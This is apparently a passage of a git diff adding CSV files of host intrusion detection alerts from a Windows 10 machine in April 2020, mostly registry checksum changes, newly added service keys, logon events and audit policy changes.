'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'e8b3d7e25b8fb5dd2b186e056006ffd4' +New md5sum is : '7240a18caf04121b74478e7da7e0eddf' +Old sha1sum was: 'b321fb7cfcf165737c087395491ecb8c386e9010' +New sha1sum is : 'de75c9a9e7459b4a609c6d023194a2488b0674b2' +" +"Apr 4, 2020 @ 13:47:21.504",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DsmSvc\State' checksum changed. +Old md5sum was: '63455c20cde548e288f8dba9a00dd33b' +New md5sum is : '760a4bada178d4343aea42eba0843c6c' +Old sha1sum was: '28420a387fa959459932089a9494e96fcc914797' +New sha1sum is : '52d66aacb149b05f27bc68ebecd67c04e65c70a2' +" +"Apr 4, 2020 @ 13:47:20.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '5d59f40e382b0bd5741c31b20dc9877d' +New md5sum is : 'f4721c75c25d3019e13727c4564e8b2f' +Old sha1sum was: '35a4b6689f4c1e64b1097375ed53f30de17c00da' +New sha1sum is : 'a084eccb913b5a0a6c991c6e9802c2585257376e' +" +"Apr 4, 2020 @ 13:47:19.239",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:19.223",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:19.161",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:19.145",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:18.926",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:18.897",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:18.286",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:18.271",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:18.122",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:18.113",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:17.910",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'f831bbb4b4e3aa71d36063136978431b' +New md5sum is : '660c9a37dafe24ad7d156238c5a03fd6' +Old sha1sum was: 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +New sha1sum is : '43d141d31fb892a664f9b819e3cf8f0a06efe4f2' +" +"Apr 4, 2020 @ 13:47:16.645",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:16.629",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:16.488",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:16.473",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:16.404",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:16.380",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:13.478",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:13.456",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 13:47:13.421",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 13:47:13.401",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 13:47:13.380",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 13:47:13.357",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 13:47:13.341",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:12.348",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:12.334",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:12.051",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '0fbd85d390c648f73d243e459fc4c439' +New md5sum is : '6f34b4bb3938c2ff6084d0e75b760f95' +Old sha1sum was: '4cfcff84f3698f6a858f7a5799d31fc7d81426df' +New sha1sum is : 'dfbd33c8174b1de1278046c9f798a3f5ae1bb7f9' +" +"Apr 4, 2020 @ 13:47:12.031",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'd27ed1a432d89e8be52f17c1744a38bc' +New md5sum is : 'fb459385be06365d0ed41734e9b9fe7d' +Old sha1sum was: 'f5193efad00e671e9802d94baecb86989890a7f3' +New sha1sum is : '68b8a07ed62540dbd0dbecfd90235f9da9159a35' +" +"Apr 4, 2020 @ 13:47:11.989",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '96524085ad01638d29a94ea6811680f0' +New md5sum is : '2ffb7d4daf513b355e485a82a1be52f5' +Old sha1sum was: 'd60d212b81c6fa16646c5fc9724e1eb7edba2639' +New sha1sum is : '45208235c4ca115bed4ae945dc532b5ccfbcafd1' +" +"Apr 4, 2020 @ 13:47:09.348",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:09.333",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:02.473",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:46:26.083",3,"Windows User Logoff", +"Apr 4, 2020 @ 13:46:26.067",3,"Windows User Logoff", +"Apr 4, 2020 @ 13:46:26.022",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 13:46:25.990",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 13:46:24.781",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 13:45:56.068",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:45:56.037",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 13:45:53.396",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 13:45:39.458",3,"The Windows Search Service started", +"Apr 4, 2020 @ 13:45:39.443",3,"The database engine attached a database", +"Apr 4, 2020 @ 13:45:39.297",3,"The database engine has completed recovery steps", +"Apr 4, 2020 @ 13:45:39.147",3,"The database engine is replaying log file C:\Winnt\system32\wins\j50.log", +"Apr 4, 2020 @ 13:45:39.127",9,"Windows Application error event", +"Apr 4, 2020 @ 13:45:39.085",9,"Windows Application error event", +"Apr 4, 2020 @ 13:45:39.045",9,"Windows Application error event", +"Apr 4, 2020 @ 13:45:38.999",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:45:38.945",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:45:38.836",3,"The database engine is initiating recovery steps", +"Apr 4, 2020 @ 13:45:38.751",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 13:45:35.465",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 13:45:34.713",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 13:45:34.700",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 13:45:34.593",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:45:34.436",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 13:45:32.280",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 13:44:52.877",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 13:44:52.720",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 13:43:51.842",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:43:47.587",3,"Service startup type was changed", diff --git a/data/NULLTEST_HIDS_2.csv b/data/NULLTEST_HIDS_2.csv new file mode 100644 index 0000000..ea3358b --- /dev/null +++ b/data/NULLTEST_HIDS_2.csv @@ -0,0 +1,1949 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 10:32:12.630",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '2d06df654a5682deb631986d5e100e06' +New md5sum is : '56964b8b919146ca6cc9ba7178dd83a5' +Old sha1sum was: 'fad4ff695b75db7b46758e17f337de0152aa22a4' +New sha1sum is : '2df5a62e483eea805585c37dca6c9f1db2862114' +", +"Apr 24, 2020 @ 10:32:12.614",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '0507a05dac0cb01533bea9c7856dd320' +New md5sum is : 'bab496d513226eb473b16a89f761c50b' +Old sha1sum was: 'be87be8572a241e55153e65f30b0e97ba6d756d2' +New sha1sum is : 'cb245448d7f93975cecec7d7b19de4fc8a559508' +", +"Apr 24, 2020 @ 10:32:07.179",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: '06f5c6f330af834dd08ce904d9ae7cc8' +New md5sum is : 'f5ea91602eb594fc2b4973f59a513fcb' +Old sha1sum was: '0cf4c4c19a1201e41b9deba273320298f4f97b50' +New sha1sum is : '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +", +"Apr 24, 2020 @ 10:31:58.848",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '5689c2dd6ed61a04cc389b6099c0aea5' +New md5sum is : '635e192cad83fcc0e1b59bc4458960b4' +Old sha1sum was: '64932df77c40a56e97edb3553ce359b3aaff132e' +New sha1sum is : 'e0e382309ad45d83861d26b3d86c0fab6345eb7b' +", +"Apr 24, 2020 @ 10:31:58.802",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '5b91e535422785d7409df5362ceec530' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '4e27ba555e6d427aef066e320154eafec1fd64e2' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +", +"Apr 24, 2020 @ 10:31:44.644",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcbService\NCBKapiNlmCache\4' was added. +", +"Apr 24, 2020 @ 10:31:35.863",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:25:31Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:31:32.598",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GoogleChromeElevationService' checksum changed. +Old md5sum was: '8689e28cb67cdeb16cd0f213c561238e' +New md5sum is : '7623ffed143b7459169ba5677dbcbf32' +Old sha1sum was: '9a0d97c845587be7605acb61023bb439126934df' +New sha1sum is : '0a808618d3ad142d9f619d043ca088fdcfc9a841' +", +"Apr 24, 2020 @ 10:31:29.426",5,"The VSS service is shutting down due to idle timeout",,"""The VSS service is shutting down due to idle timeout. """ +"Apr 24, 2020 @ 10:31:19.430",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\Chrome' checksum changed. +Old md5sum was: '5af3a18aae7113a12564a454973b2929' +New md5sum is : '22ece9a19429dc28f03e236b27d22f81' +Old sha1sum was: '0a00a2e519a32df06bc9533712e616c7a04e7c55' +New sha1sum is : 'd43b78e147f35d6834e93dded1d3c6395c512b09' +", +"Apr 24, 2020 @ 10:31:08.213",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '164ddf65a0229b0a5673d9643fd360a5' +New md5sum is : '9f0f9f207f2d810a4ae3c4b3cbab8c7c' +Old sha1sum was: 'abc03ba9189e8ab0e57d2f28ac2a9479d27eb1de' +New sha1sum is : '888bf3834cb974e6c6f05e415c259a853bc588a5' +", +"Apr 24, 2020 @ 10:30:32.951",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:25:31Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:30:26.085",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:30:08.543",5,"Windows System error event",,"""The server {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} did not register with DCOM within the required timeout.""" +"Apr 24, 2020 @ 10:30:00.579",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"Apr 24, 2020 @ 10:29:36.027",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:25:34Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:29:34.213",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 10:29:31.088",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 10:29:04.455",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 10:28:43.391",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 10:28:43.375",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 10:28:33.781",5,"File added to the system.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce' was added. +", +"Apr 24, 2020 @ 10:28:33.752",5,"File added to the system.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce' was added. +", +"Apr 24, 2020 @ 10:28:33.475",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '1af7f0914012f801bdabc07119bd84db' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +", +"Apr 24, 2020 @ 10:28:32.194",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : '1e9409baa8b68f8d5dfa081e75151003' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : '25555a4f57a7b2144caabaf450eb56fe7119a8c0' +", +"Apr 24, 2020 @ 10:28:32.180",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : '4c17291dcd0de9eb46f1bf8312d3f109' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : 'a02aa7cd463261dc68ec18a39291b1918d32122d' +", +"Apr 24, 2020 @ 10:28:30.925",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:28:28.128",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:28:28.112",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:28:26.425",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '39324a091e8e394cfa0881ee3414520b' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'fa56f0ef6e21e4f64af4ae07bada3b859656ac2b' +", +"Apr 24, 2020 @ 10:28:26.410",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '3ab42836b91eda6d7a737f85db75cc0f' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '3e85e472ca462ac01899caabb6d29f1f7cf46732' +", +"Apr 24, 2020 @ 10:28:20.927",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '2d06df654a5682deb631986d5e100e06' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : 'fad4ff695b75db7b46758e17f337de0152aa22a4' +", +"Apr 24, 2020 @ 10:28:20.914",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '0507a05dac0cb01533bea9c7856dd320' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'be87be8572a241e55153e65f30b0e97ba6d756d2' +", +"Apr 24, 2020 @ 10:28:20.322",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : 'c361117616a05d4278b52bebd6da3141' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : 'ec1bd80ed1806a52ea2bf63712d2625626a71bc5' +", +"Apr 24, 2020 @ 10:28:19.928",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:28:19.819",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:28:18.100",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '544514e57047c2570309981465630650' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +", +"Apr 24, 2020 @ 10:28:15.943",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : '6c9fa8f349691cfc6474afbfb85a26d0' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : 'cf2a4ead8cc286234f64909716907d8e036d500a' +", +"Apr 24, 2020 @ 10:28:15.724",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:28:15.708",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:28:15.068",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New 